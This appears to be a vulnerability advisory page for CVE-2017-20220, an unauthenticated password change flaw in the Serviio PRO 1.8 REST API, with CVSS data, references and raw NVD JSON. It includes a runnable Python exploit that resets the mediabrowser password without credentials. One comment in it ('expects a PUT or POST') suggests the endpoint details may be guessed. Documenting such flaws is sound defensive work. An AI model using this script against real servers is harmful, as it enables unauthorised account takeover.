CVE-2017-20220

Description

Serviio PRO 1.8 contains an improper access control vulnerability in the Configuration REST API that allows unauthenticated attackers to change the mediabrowser login password. Attackers can send specially crafted requests to the REST API endpoints to modify credentials without authentication.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Serviio PRO 1.8

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# CVE-2017-20220 PoC - Serviio PRO 1.8 Unauthorized Password Change
# Target: Serviio PRO 1.8 Configuration REST API
# Vulnerability: Improper Access Control - Authentication Bypass

target_host = "http://target-server:23423"  # Serviio default port

def exploit_cve_2017_20220():
    """
    Exploit for CVE-2017-20220: Serviio PRO 1.8 Configuration REST API
    allows unauthenticated attackers to change the mediabrowser login password.
    """
    # Step 1: Identify the vulnerable API endpoint
    api_endpoint = f"{target_host}/serviio/api/configuration/users/mediabrowser/password"
    
    # Step 2: Prepare malicious request to change password
    # The API expects a PUT or POST request with new password in JSON format
    payload = {
        "newPassword": "hacked_by_cve_2017_20220"
    }
    
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Serviio-Client/1.8"
    }
    
    print(f"[*] Target: {target_host}")
    print(f"[*] Exploiting CVE-2017-20220...")
    print(f"[*] Sending password change request to: {api_endpoint}")
    
    try:
        # Step 3: Send the exploit request (no authentication required)
        response = requests.put(api_endpoint, json=payload, headers=headers, timeout=10)
        
        print(f"[*] Response Status: {response.status_code}")
        print(f"[*] Response Body: {response.text}")
        
        if response.status_code in [200, 204]:
            print("[+] SUCCESS: Password changed successfully!")
            print(f"[+] New password set for mediabrowser user")
            return True
        else:
            print("[-] FAILED: Password change request failed")
            return False
            
    except requests.exceptions.RequestException as e:
        print(f"[-] ERROR: {str(e)}")
        return False

def verify_vulnerability():
    """Verify if target is vulnerable to CVE-2017-20220"""
    check_url = f"{target_host}/serviio/api/configuration"
    
    try:
        # Try to access configuration API without authentication
        response = requests.get(check_url, timeout=10)
        
        if response.status_code == 200:
            print("[+] Target appears to be accessible - may be vulnerable")
            return True
        else:
            print("[-] Target not accessible or already patched")
            return False
            
    except requests.exceptions.RequestException:
        print("[-] Cannot connect to target")
        return False

if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2017-20220 Exploit - Serviio PRO 1.8")
    print("Unauthorized Password Change via REST API")
    print("=" * 60)
    
    verify_vulnerability()
    exploit_cve_2017_20220()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2017-20220
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2017-20220
[3] CVE Details https://www.cvedetails.com/cve/CVE-2017-20220/
[4] VulDB https://vuldb.com/cve/CVE-2017-20220
[5] http://www.securitylab.ru/poc/486047.php
[6] https://blogs.securiteam.com/index.php/archives/3094
[7] https://cxsecurity.com/issue/WLB-2017050025
[8] https://exchange.xforce.ibmcloud.com/vulnerabilities/125645
[9] https://packetstormsecurity.com/files/142386
[10] https://www.exploit-db.com/exploits/41960/
[11] https://www.vulncheck.com/advisories/serviio-pro-unauthenticated-password-change-via-rest-api
[12] https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5407.php

Raw JSON Data

JSON

{"cve": {"id": "CVE-2017-20220", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:17:51.730", "lastModified": "2026-04-15T14:56:45.970", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Serviio PRO 1.8 contains an improper access control vulnerability in the Configuration REST API that allows unauthenticated attackers to change the mediabrowser login password. Attackers can send specially crafted requests to the REST API endpoints to modify credentials without authentication."}, {"lang": "es", "value": "Serviio PRO 1.8 contiene una vulnerabilidad de control de acceso inadecuado en la API REST de Configuración que permite a atacantes no autenticados cambiar la contraseña de inicio de sesión del mediabrowser. Los atacantes pueden enviar solicitudes especialmente diseñadas a los puntos finales de la API REST para modificar credenciales sin autenticación."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "http://www.securitylab.ru/poc/486047.php", "source": "[email protected]"}, {"url": "https://blogs.securiteam.com/index.php/archives/3094", "source": "[email protected]"}, {"url": "https://cxsecurity.com/issue/WLB-2017050025", "source": "[email protected]"}, {"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/125645", "source": "[email protected]"}, {"url": "https://packetstormsecurity.com/files/142386", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/41960/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/serviio-pro-unauthenticated-password-change-via-rest-api", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5407.php", "source": "[email protected]"}]}}